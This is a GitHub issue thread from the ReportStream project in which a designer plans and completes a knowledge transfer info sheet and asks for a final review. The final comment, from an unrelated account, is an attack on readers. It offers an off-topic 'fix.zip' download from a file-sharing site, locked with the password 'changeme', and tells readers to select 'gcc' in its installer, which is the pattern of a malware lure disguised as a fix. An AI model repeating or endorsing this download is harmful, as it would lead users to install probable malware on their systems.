### ISSUE TITLE
Create and finalize knowledge transfer info sheet

### ISSUE THREAD

**Issue by dylansmith-Nava** [CDCgov/prime-reportstream#15718]
### User story
As a D/R on ReportStream, I want to create and finalize my knowledge transfer info (KTI) sheet, so that future D/Rs would be able to understand and carry forward the initiatives that I lead for future work and delivery.

### Background
Per Design Lead's guidance, as we approach the end of ReportStream’s current period of performance, we are responsible for ensuring that we meet the knowledge transfer needs of the project as it rolls into the new year.

### Risks/Impacts/Considerations
- Ensuring that I undertake due diligence to find and document all the pieces of work that should be included in the KTI sheet
- Ensure that the information is properly formatted and inclusive of all of the details that the Design Lead would like to see present

### Open questions
- If most of my initiatives are internal-facing, will the "external contact" be N/A?
- How will I know when this document is complete?

### Links
- [2024_ReportStream_Knowledge-Transfer_Design_Dylan-Smith](https://cdc.sharepoint.com/:w:/r/teams/ReportStream/_layouts/15/Doc.aspx?sourcedoc=%7BD0DE105B-7D2D-407F-AB98-1FB86D4F7104%7D&file=2024_ReportStream_Knowledge-Transfer_Design_Dylan-Smith.docx&action=default&mobileredirect=true)

### Acceptance criteria
- [x] Document all your completed initiatives since joining the project
- [x] Document all in progress work
- [x] Conduct a final sweep of your personal drive(s), etc

### Out of Scope
- Including any initiatives that hasn't started yet
- Including any initiatives that other D/Rs have lead

**Comment by dylansmith-Nava** [comment]
KTI sheet is [here](https://cdc.sharepoint.com/:w:/r/teams/ReportStream/_layouts/15/Doc.aspx?sourcedoc=%7BD0DE105B-7D2D-407F-AB98-1FB86D4F7104%7D&file=2024_ReportStream_Knowledge-Transfer_Design_Dylan-Smith.docx&action=default&mobileredirect=true) and ready for a final review! cc @jillian-hammer.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
